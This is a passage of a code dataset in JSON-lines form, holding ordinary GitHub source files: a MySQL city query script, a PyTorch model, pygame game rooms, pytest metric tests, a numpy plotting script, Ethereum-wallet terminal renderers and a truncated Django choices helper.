database=sys.argv[3],\n port=3306)\n cursor = db_connection.cursor()\n cursor.execute(\n \"SELECT cities.name\\\n FROM cities\\\n INNER JOIN states\\\n ON cities.state_id = states.id\\\n WHERE states.name = %s\\\n ORDER BY cities.id\", (sys.argv[4], ))\n esp = \"\"\n for row in cursor.fetchall():\n print(f\"{esp}{row[0]}\", end=\"\")\n esp = \", \"\n print()\n cursor.close()\n db_connection.close()\n", "repo_name": "vsroyvs/holbertonschool-higher_level_programming", "sub_path": "python-object_relational_mapping/5-filter_cities.py", "file_name": "5-filter_cities.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "MySQLdb.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "73537115684", "text": "import torch\nimport torch.nn as nn\n\nfrom oscillate.model.model.decoder import Decoder\nfrom oscillate.model.model.encoder import Encoder\n\n\nclass TTAModel(nn.Module):\n\n\tdef __init__(self, encoder: Encoder, decoder: Decoder, *args, decoder_vocab_size=1024, dtype=torch.float32, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.encoder = encoder\n\t\tself.decoder = decoder\n\t\tself.enc_reshape = nn.Linear(self.encoder.emb_size, self.decoder.emb_size, dtype=dtype)\n\t\tself.dec_reshape = nn.Linear(self.decoder.emb_size, decoder_vocab_size * self.decoder.input_emb_size, dtype=dtype)\n\t\tself.softmax = nn.Softmax(-1)\n\t\tself.decoder_vocab_size = decoder_vocab_size\n\n\tdef forward(self, X_encoder, X_decoder):\n\t\ty_encoder, pad_mask = self.encoder(X_encoder)\n\t\ty_encoder = self.enc_reshape(y_encoder)\n\t\ty_decoder = self.decoder(X_decoder, y_encoder, pad_mask)\n\t\ty_decoder = y_decoder[:, -1]\n\t\ty = self.dec_reshape(y_decoder)\n\t\ty = y.reshape((X_decoder.shape[0], self.decoder.input_emb_size, self.decoder_vocab_size))\n\t\ty = self.softmax(y)\n\t\treturn y\n", "repo_name": "abreham-atlaw/oscillate", "sub_path": 
"src/python/oscillate/model/model/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "oscillate.model.model.encoder.Encoder", "line_number": 10, "usage_type": "name"}, {"api_name": "oscillate.model.model.decoder.Decoder", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.float32", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "7780882778", "text": "import pygame\nfrom Itens.Itens import KeyItem\nfrom Salas.Room import Room\nfrom Itens.Arrows import BackArrow,UpArrow,DiagonalArrow\n\nclass Quarto(Room):\n def __init__(self,map):\n super().__init__()\n self.room_name = \"Quarto\"\n self.image = \"graphics/Cenario 1/Quarto_gaveta_fechada.png\"\n self.exits = [\"Up\",\"Back\"]\n self.exitsName = [\"QuartoPorta\"]\n self.map = map\n \n self.arrows = [BackArrow((420,450))]\n \n self.gaveta = QuartoGaveta(self)\n self.quartoPorta = QuartoPorta(self)\n self.quartoTeto = QuartoTeto(self)\n\n self.interactives = {\"cama\": pygame.Rect((505,230),(349,250)), \n \"armario\": pygame.Rect((78,46),(251,417)),\n \"comoda\": pygame.Rect((355,327),(129,136))}\n\n self.id = \"Quarto\"\n\n self.tutorial_phase = 0\n\n \n\n \n\n \n def backLocation(self):\n return self.quartoPorta\n def upLocation(self):\n # if not(\"comoda\" in self.interactives):\n # self.addRect(pygame.Rect((355,327),(129,136)), \"comoda\")\n return self.quartoTeto\n\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n \n\n if rect == self.interactives[\"comoda\"]: # Cômoda do quarto\n \n if not self.quartoTeto.firstTime:\n player.change_room(self.gaveta, sound = \"None\")\n self.image = \"graphics/Cenario 1/Quarto_gaveta_aberta.png\"\n self.quartoTeto.image = \"graphics/Cenario 1/Teto_gaveta_aberta.png\"\n \n if not self.quartoTeto.gaveta_open:\n self.quartoTeto.gaveta_open = True\n pygame.mixer.Sound(\"audio/Sound Effects/gaveta_abrindo.mp3\").play()\n else:\n player.dialog_manager.set_dialog(\"interacao_comoda\")\n\n if rect == self.interactives[\"cama\"]:\n player.dialog_manager.set_dialog(\"interacao_cama\")\n\n if rect == self.interactives[\"armario\"]:\n player.dialog_manager.set_dialog(\"interacao_armario\")\n\n def update(self, screen):\n \n if self.tutorial_phase == 0:\n self.map.player.dialog_manager.set_dialog(\"tutorial_dialog_0\", color = (102, 250, 245))\n self.tutorial_phase = 1\n return super().update(screen)\n\n\nclass QuartoGaveta(Room):\n def __init__(self,quarto):\n super().__init__()\n self.room_name = \"QuartoGaveta\"\n self.exits = [\"Back\"]\n self.arrows = [BackArrow((42,385))]\n self.quarto = quarto\n self.image = \"graphics/Cenario 1/gaveta_gancho.png\"\n self.gancho_breakable = False\n self.gancho = True\n \n self.interactives = {\"gancho\": pygame.Rect((510,157),(147,69))}\n \n \n\n def backLocation(self):\n return self.quarto\n\n\n def 
ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n if rect == self.interactives[\"gancho\"]: # Porta\n if self.gancho_breakable and self.gancho:\n self.gancho = False\n self.image = \"graphics/Cenario 1/gaveta.png\"\n self.quarto.quartoTeto.image = \"graphics/Cenario 1/Teto_gaveta.png\"\n chave = KeyItem(dialog = \"item_tutorial\", dialog_color = (102, 250, 245));\n chave.rect.x = 400\n chave.rect.y = 318\n self.quarto.itens.append(chave)\n pygame.mixer.Sound(\"audio/Sound Effects/key_dropping.mp3\").play()\n \n \n elif self.gancho:\n player.dialog_manager.set_dialog(\"interacao_gancho\")\n \n \n \n\n \nclass QuartoPorta(Room):\n def __init__(self,quarto):\n super().__init__()\n self.room_name = \"QuartoPorta\"\n self.exits = [\"Back\",\"Up\"]\n self.image = \"graphics/Cenario 1/Quarto_porta_fechada.png\"\n self.arrows = [BackArrow((486,431))]\n self.quarto = quarto\n self.door_status = False\n\n\n porta_rect = pygame.Rect((409,103),(165,314))\n self.interactives[\"porta\"] = porta_rect\n \n def backLocation(self):\n return self.quarto\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n if rect == self.interactives[\"porta\"]: # Porta\n if not self.door_status:\n player.dialog_manager.set_dialog(\"interacao_porta\")\n if len(self.quarto.arrows) < 2:\n self.quarto.arrows.append(UpArrow((420,100), sound = \"None\"))\n else:\n player.change_room(self.quarto.RoomExitClassFromMap(self.quarto.map,self.quarto.exitsName[0]))\n \n def update(self, screen):\n \n if self.quarto.tutorial_phase == 1:\n self.quarto.map.player.dialog_manager.set_dialog(\"tutorial_dialog_1\", color = (102, 250, 245))\n self.quarto.tutorial_phase = 2\n return super().update(screen)\n\n def useItem(self, rect, player):\n itemHolding = player.itemHolding.sprites()[0]\n if rect in [interactives for interactives in self.interactives.values()]:\n if rect == self.interactives[\"porta\"] and itemHolding.type == KeyItem().type:\n print(\"abriu\")\n player.inventory.remove(itemHolding)\n self.door_status = True\n pygame.mixer.Sound(\"audio/Sound Effects/open_door.mp3\").play()\n self.image = \"graphics/Cenario 1/Quarto_porta_aberta.png\"\n\n\nclass QuartoTeto(Room):\n def __init__(self,quarto):\n super().__init__()\n self.room_name = \"QuartoTeto\"\n self.exits = [\"Back\"]\n self.arrows = [DiagonalArrow( (127,425), -90, sound = \"None\")]\n self.image = \"graphics/Cenario 1/Teto_gaveta_fechada.png\"\n self.quarto = quarto\n self.firstTime = True\n self.gaveta_open = False\n \n self.interactives = {\"gaveta\": pygame.Rect((411,29),(112,120))}\n\n def backLocation(self):\n return self.quarto\n\n def update(self, screen):\n \n if self.firstTime:\n self.quarto.map.player.dialog_manager.set_dialog(\"FirstTime_QuartoTeto\")\n self.firstTime = False\n \n elif self.quarto.tutorial_phase == 2:\n self.quarto.map.player.dialog_manager.set_dialog(\"FirstTime_QuartoTeto\")\n self.quarto.tutorial_phase = 3\n return super().update(screen)\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n if rect == self.interactives[\"gaveta\"] and self.gaveta_open and self.quarto.gaveta.gancho: \n self.quarto.map.player.dialog_manager.set_dialog(\"interacao_gaveta\")\n self.quarto.gaveta.gancho_breakable = True\n", "repo_name": "Endobear/SMAUG-2", "sub_path": "Salas/Quarto.py", "file_name": "Quarto.py", "file_ext": "py", "file_size_in_byte": 6768, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Salas.Room.Room", 
"line_number": 6, "usage_type": "name"}, {"api_name": "Itens.Arrows.BackArrow", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "Salas.Room.Room", "line_number": 73, "usage_type": "name"}, {"api_name": "Itens.Arrows.BackArrow", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 84, "usage_type": "call"}, {"api_name": "Itens.Itens.KeyItem", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Salas.Room.Room", "line_number": 113, "usage_type": "name"}, {"api_name": "Itens.Arrows.BackArrow", "line_number": 119, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 124, "usage_type": "call"}, {"api_name": "Itens.Arrows.UpArrow", "line_number": 136, "usage_type": "call"}, {"api_name": "Itens.Itens.KeyItem", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 154, "usage_type": "attribute"}, {"api_name": "Salas.Room.Room", "line_number": 158, "usage_type": "name"}, {"api_name": "Itens.Arrows.DiagonalArrow", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "41779136422", "text": "import pytest\nfrom src.evaluate import AnchorResults, EAO_Rank\n\n\ndef test_iou():\n n_misses_allowed = 10\n iou_threshold = 0.1\n err_3d_threshold = 1000\n ar = AnchorResults(n_misses_allowed, iou_threshold, err_3d_threshold)\n # Empty intersection\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (5, 5, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == 0.0)\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (2, 2, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == 0.0)\n # Full intersection\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (0, 0, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == 1.0)\n bbox_gt = (5, 5, 10, 10)\n bbox_p = (5, 5, 10, 10)\n assert(ar.get_iou(bbox_gt, bbox_p) == 1.0)\n # Partial intersection\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (1, 1, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == pytest.approx(0.142, 0.01))\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (1, 0, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == pytest.approx(0.333, 0.01))\n\n\ndef test_robustness():\n n_misses_allowed = 10\n iou_threshold = 0.1\n err_3d_threshold = 1000\n ar = AnchorResults(n_misses_allowed, iou_threshold, err_3d_threshold)\n ar.robustness_frames_counter = 25\n ar.n_visible_and_not_diff = 40\n ar.n_excessive_frames = 10\n rob = ar.get_robustness_score(25)\n assert(rob == 0.5) # 25 / (40 + 10)\n\n\ndef test_accuracy():\n n_misses_allowed = 10\n iou_threshold = 0.1\n err_3d_threshold = 1000\n ar = AnchorResults(n_misses_allowed, iou_threshold, err_3d_threshold)\n ar.iou_list = [1.0, 1.0, 0.5, 0.5]\n ar.n_visible_and_not_diff = 4\n acc = ar.get_accuracy_score()\n assert(acc == 0.75)\n\n\ndef test_EAO_Rank():\n # Empty sequence\n ss_list = []\n rank = EAO_Rank(0, 0)\n eao = rank.calculate_eao_score()\n assert(eao == 0.0)\n # Single sequence\n ss_list = [[1., 1., 1.]]\n rank = EAO_Rank(0, len(ss_list[0]))\n rank.final_ss = 
ss_list\n    rank.all_ss_len_max = len(ss_list[0])\n    eao = rank.calculate_eao_score()\n    assert(eao == 1.0)\n    ss_list = [[1., \"ignore\", 1.]]\n    rank = EAO_Rank(0, len(ss_list[0]))\n    rank.final_ss = ss_list\n    rank.all_ss_len_max = len(ss_list[0])\n    eao = rank.calculate_eao_score()\n    assert(eao == 1.0)\n    # Multiple sequences\n    ss_list = [[1.],\n               [0.]]\n    rank = EAO_Rank(0, len(ss_list[0]))\n    rank.final_ss = ss_list\n    rank.all_ss_len_max = 1\n    eao = rank.calculate_eao_score()\n    assert(eao == 0.5)\n    ss_list = [[\"ignore\"],\n               [0.7215]]\n    rank = EAO_Rank(0, len(ss_list[0]))\n    rank.final_ss = ss_list\n    rank.all_ss_len_max = 1\n    eao = rank.calculate_eao_score()\n    assert(eao == 0.7215)\n    ss_list = [[1.0],\n               [0.75],\n               [0.5],\n               [0.25],\n               [0.0]]\n    rank = EAO_Rank(0, len(ss_list[0]))\n    rank.final_ss = ss_list\n    rank.all_ss_len_max = 1\n    eao = rank.calculate_eao_score()\n    assert(eao == 0.5)\n    # Test curve\n    ss_list = [[0.3605, 0.5, \"ignore\", 0.],\n               [0.0000, 0.0, 0., 0.7215]]\n    rank = EAO_Rank(0, len(ss_list[0]))\n    eao_curve = rank.calculate_eao_curve(ss_list, len(ss_list[0]))\n    assert(eao_curve[0] == 0.18025)\n    assert(eao_curve[1] == 0.25)\n    assert(eao_curve[2] == 0.0)\n    assert(eao_curve[3] == 0.36075)\n", "repo_name": "leopoldmueller/surg_tracking", "sub_path": "tests/test_evaluate.py", "file_name": "test_evaluate.py", "file_ext": "py", "file_size_in_byte": 3252, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "src.evaluate.AnchorResults", "line_number": 9, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 30, "usage_type": "call"}, {"api_name": "src.evaluate.AnchorResults", "line_number": 37, "usage_type": "call"}, {"api_name": "src.evaluate.AnchorResults", "line_number": 49, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 59, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 64, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 70, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 78, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 85, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 95, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "2138419395", "text": "\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\n\ndef save(filename, names, data):\n    \"\"\"\n    filename = a string specifying the name of the file to be saved\n    names = a tuple of the variable names given as strings\n    data = a tuple of arrays\n    \"\"\"\n\n    fyl = open(filename, 'wb')\n\n    for i, name in enumerate(names):\n        fyl.write((name + '\\n').encode()) # \\n = a linebreak; file is binary, so text must be encoded\n\n        var = data[i]\n        shape = var.shape\n        shape = ','.join(np.array(shape,dtype=str))\n        fyl.write((shape+'\\n').encode())\n        \n        dtype = str(var.dtype)\n        fyl.write((dtype+'\\n').encode())\n\n        var_str = var.flatten().tobytes()\n        fyl.write(var_str+b'\\n\\n')\n\n    fyl.close()\n    \n\n\n\ndef restore(filename):\n    \"\"\"\n    filename = a string specifying the name of the file to be restored\n    \"\"\"\n\n    fyl = open(filename,'rb')\n\n    data = []\n    \n    print(\"Restoring variables: \\n\")\n    while True:\n        var_name = fyl.readline().decode()\n        if var_name == \"\": break\n        print(var_name)\n\n        shape = fyl.readline().decode().replace('\\n', '') # I CHANGED THIS\n        shape = shape.split(',')\n        shape = np.array(shape,dtype=int)\n        \n        dtype = 
fyl.readline().decode().replace('\\n','') # I CHANGED THIS\n\n        data_str = b\"\"\n        line = b\"\"\n        while line != b'\\n':\n            data_str += line\n            line = fyl.readline()\n\n        array = np.fromstring(data_str[:-1],dtype=dtype)\n        array = array.reshape(shape)\n        data.append(array) \n\n    fyl.close()\n    return data\n\n\n# In[2]:\n\njuldate,averager,averagek,variancer,variancek = restore('Wilson_project3Cii.dat')\n\n\n# In[5]:\n\nimport matplotlib.pyplot as plt\nf, axarr = plt.subplots(2,1) #This part of the code takes the two histograms and puts them in the same image\nplt.subplots_adjust(hspace = 0.55,wspace = 0.5)\nfigure = plt.gcf()\n\naxarr[0].plot(juldate,averager,label = 'Red Continuum',color='R')#plot of 1st moment vs. time\naxarr[0].plot(juldate,averagek,label = \"Calcium\")\naxarr[0].set_title('1st Moment for Both Filters') \naxarr[0].set_ylabel('Average') \naxarr[0].set_xlabel('Time of Day')\naxarr[0].legend(loc=5) #I needed to change the location of the legend so it didn't overlap with the data\n\naxarr[1].plot(juldate,variancer,label = 'Red Continuum',color='R')#plot of 2nd moment vs. time\naxarr[1].plot(juldate,variancek,label = \"Calcium\")\naxarr[1].set_title('2nd Moment for Both Filters') \naxarr[1].set_ylabel('Variance') \naxarr[1].set_xlabel('Time of Day')\naxarr[1].legend(loc=5)\n\nfigure.savefig('Wilson_project3Cii.png',format='png')\nplt.show()\n\n\n# In[ ]:\n\n\n\n", "repo_name": "skyentist/Astr3800", "sub_path": "Project3/Wilson_project3Cii_plot.py", "file_name": "Wilson_project3Cii_plot.py", "file_ext": "py", "file_size_in_byte": 2560, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "20332304505", "text": "from asciimatics.renderers import DynamicRenderer\nfrom asciimatics.screen import Screen\nfrom decimal import Decimal\nfrom shadowlands.tui.errors import PriceError\nfrom shadowlands.sl_node import NodeConnectionError\nimport qrcode\nfrom shadowlands.tui.debug import debug\nimport pdb\n\nSL_COLOR = (Screen.COLOUR_GREEN, Screen.A_NORMAL, Screen.COLOUR_BLACK)\n\n\ndef sl_color_map(image):\n    return [SL_COLOR for _ in range(len(image))]\n\n\nclass TxQueueHashRenderer(DynamicRenderer):\n\n    def __init__(self, interface):\n        super(TxQueueHashRenderer, self).__init__(1, 32)\n        self._interface = interface\n\n    @property\n    def txqueue(self):\n        return self._interface.config.txqueue\n\n    def _render_now(self):\n        if len(self.txqueue(self._interface.node.network)) < 1:\n            return [''], [()]\n\n        image = \"TXs: \" \n        color_map = sl_color_map(image)\n\n        for index, tx in enumerate(self.txqueue(self._interface.node.network)):\n\n            if index > 0 and index < 
len(self.txqueue(self._interface.node.network)):\n image += '║'\n color_map += [SL_COLOR]\n \n tx_image = \" {}) {} \".format(index, tx['rx'].hash.hex()[0:9])\n tx_map = sl_color_map(tx_image) \n tx_map[1] = (Screen.COLOUR_WHITE, \n Screen.A_BOLD, \n Screen.COLOUR_BLACK) \n image += tx_image \n color_map += tx_map\n\n #debug(); pdb.set_trace()\n return [image], [color_map]\n\n\n#debug(); pdb.set_trace()\ndef img_colour_map(image):\n return image, [[(Screen.COLOUR_GREEN, Screen.A_NORMAL, Screen.COLOUR_BLACK) for _ in range(len(image[0])) ] ]\n\nclass NetworkStatusRenderer(DynamicRenderer):\n def __init__(self, _node):\n super(NetworkStatusRenderer, self).__init__(1, 25)\n self.node = _node\n\n def _render_now(self):\n if self.node.connection_type and self.node.network_name:\n image = [\"{}, {}\".format(self.node.connection_type, self.node.network_name)]\n else:\n image = ['No ethereum connection']\n\n return img_colour_map(image)\n\n\nclass BlockStatusRenderer(DynamicRenderer):\n def __init__(self, _node):\n super(BlockStatusRenderer, self).__init__(1, 40)\n self.node = _node\n\n\t\n def _render_now(self):\n images = ['[block ' + str(self.node.best_block) + ']']\n return img_colour_map(images)\n\nclass AddressRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(AddressRenderer, self).__init__(1, 32)\n self._interface = interface\n\n def _render_now(self):\n if not self._interface.credstick:\n image = ['Unknown']\n else:\n image = [ self._interface.credstick.addressStr() ]\n\n return img_colour_map(image)\n\n\nclass HDPathRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(HDPathRenderer, self).__init__(1, 32)\n self._interface = interface\n\n def _render_now(self):\n if not self._interface.credstick:\n image = ['Unknown']\n else:\n image = [ self._interface.credstick.hdpath ]\n\n return img_colour_map(image)\n\ndef txqueue():\n #return []\n return [\n {\n 'tx_hash': '0x36283e1c4d5ce3d671597ed05812a7562b05157b3559e264f4ab473a62dc5720',\n 'description': 'Send Ether'\n },\n {\n 'tx_hash': '0x291e0c845afd6dd2a21f4933ce374c5b86db5358b1b6576829b22d30a582e2bd',\n 'description': 'Generate DAI'\n },\n {\n 'tx_hash': '0x4c8bc0842ca19d90f4c1047a3961687ea494a1d8645df02f575be863ccb9d89c',\n 'description': 'Materialize'\n },\n {\n 'tx_hash': '0x961687ea494a1d8645df02f575be863ccb9d89c',\n 'description': 'Materialize'\n },\n {\n 'tx_hash': '0x5df02f575be863ccb9d89c',\n 'description': 'Materialize'\n }\n \n ]\n\n\nclass CredstickNameRenderer(DynamicRenderer):\n def __init__(self, interface, add_padding=True):\n super(CredstickNameRenderer, self).__init__(1, 9)\n self._interface = interface\n self._node = interface.node\n self._add_padding = add_padding\n\n def _render_now(self):\n space_available = 29 \n if not self._interface.credstick:\n #image = ['blergh']\n image = ['Please insert Credstick.']\n else:\n name = self._interface.credstick.manufacturerStr + ' ' + self._interface.credstick.productStr\n address = self._interface.credstick.address\n hdpath = self._interface.credstick.hdpath\n if self._add_padding:\n padding = '═' * (space_available - len(name))\n else:\n padding = \"detected. 
\\nHD derivation {}\\nEthereum address {}\\nResolving ENS...\\nLoading Eth balance...\\nLoading Erc20 balances...\".format(hdpath, address)\n\n image = [ \"{} {}\".format(name,padding) ]\n \n return img_colour_map(image)\n\nclass QRCodeRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(QRCodeRenderer, self).__init__(17, 31)\n self._interface = interface\n\n def _render_now(self):\n if not self._interface.credstick:\n qr_image = ['No QR Data']\n colour_map = [None, 0, 0]\n else:\n #debug(); pdb.set_trace()\n qr = qrcode.QRCode(\n version=1,\n box_size=4,\n border=1,\n )\n\n #debug(); pdb.set_trace()\n qr.add_data(self._interface.credstick.addressStr())\n qr.make(fit=True)\n qr_string = qr.print_ascii(string_only=True)\n\n qr_image = qr_string.split('\\n')\n #debug(); pdb.set_trace()\n colour_map = [[(Screen.COLOUR_GREEN, Screen.A_NORMAL, Screen.COLOUR_BLACK) for _ in range(self._width)]\n for _ in range(self._height)]\n return qr_image, colour_map\n\n\n\nclass EthBalanceRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(EthBalanceRenderer, self).__init__(1, 30)\n self._interface = interface\n\n def _render_now(self):\n try:\n bal = self._interface.node.eth_balance\n except AttributeError:\n return img_colour_map(['Unknown'])\n\n bal_str = 'Unknown'\n\n if bal:\n bal_str = \"{:f}\".format( bal )\n\n image = [bal_str]\n\n return img_colour_map(image)\n\n\nclass EthValueRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(EthValueRenderer, self).__init__(1, 15)\n self._interface = interface\n\n def _render_now(self):\n bal = self._interface._node.eth_balance\n\n if bal is None or self._interface._node.eth_price is None:\n return img_colour_map([''])\n\n val = str(bal * self._interface._node.eth_price)[0:18]\n image = [ \"{} {} {}\".format('USD', '$', val) ]\n\n return img_colour_map(image)\n\n\nclass ENSRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(ENSRenderer, self).__init__(1, 16)\n self._interface = interface\n\n def _render_now(self):\n domain = self._interface.node.ens_domain\n if not domain:\n domain = 'No Reverse ENS'\n\n image = [domain]\n\n return img_colour_map(image)\n\n\n\n\n", "repo_name": "kayagoban/shadowlands", "sub_path": "shadowlands/tui/renderers.py", "file_name": "renderers.py", "file_ext": "py", "file_size_in_byte": 7360, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 142, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asciimatics.screen.Screen.COLOUR_GREEN", "line_number": 10, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 10, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_NORMAL", "line_number": 10, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 10, "usage_type": "attribute"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 17, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.COLOUR_WHITE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 42, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_BOLD", "line_number": 43, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 43, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 44, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 44, "usage_type": "name"}, {"api_name": 
"asciimatics.screen.Screen.COLOUR_GREEN", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 54, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_NORMAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 56, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 70, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 80, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 94, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 134, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 159, "usage_type": "name"}, {"api_name": "qrcode.QRCode", "line_number": 170, "usage_type": "call"}, {"api_name": "asciimatics.screen.Screen.COLOUR_GREEN", "line_number": 183, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 183, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_NORMAL", "line_number": 183, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 183, "usage_type": "attribute"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 189, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 210, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 227, "usage_type": "name"}]} +{"seq_id": "4228764594", "text": "# -*- encoding: utf-8 -*-\n\"\"\"\n@File Name : choices.py\n@Create Time : 2022/11/13 18:16\n@Description : \n@Version : \n@License : MIT\n@Author : diklios\n@Contact Email : diklios5768@gmail.com\n@Github : https://github.com/diklios5768\n@Blog : \n@Motto : All our science, measured against reality, is primitive and childlike - and yet it is the most precious thing we have.\n\"\"\"\n__auth__ = 'diklios'\n\nfrom typing import Any\n\nfrom django.db import models\n\n\ndef reverse_choices(choices: tuple[tuple] or models.Choices):\n if isinstance(choices, tuple):\n return tuple(reversed(choice) for choice in choices)\n elif isinstance(choices, models.Choices):\n return models.Choices(tuple(reversed(choice) for choice in choices.choices))\n else:\n raise TypeError('choices must be tuple or models.Choices')\n\n\ndef choices_to_dict(choices: tuple[tuple] or models.Choices) -> dict:\n if isinstance(choices, tuple):\n return {k: v for k, v in choices}\n elif isinstance(choices, models.Choices):\n return {k: v for k, v in choices.choices}\n else:\n raise TypeError('choices must be tuple or models.Choices')\n\n\ndef reverse_choices_to_dict(choices: 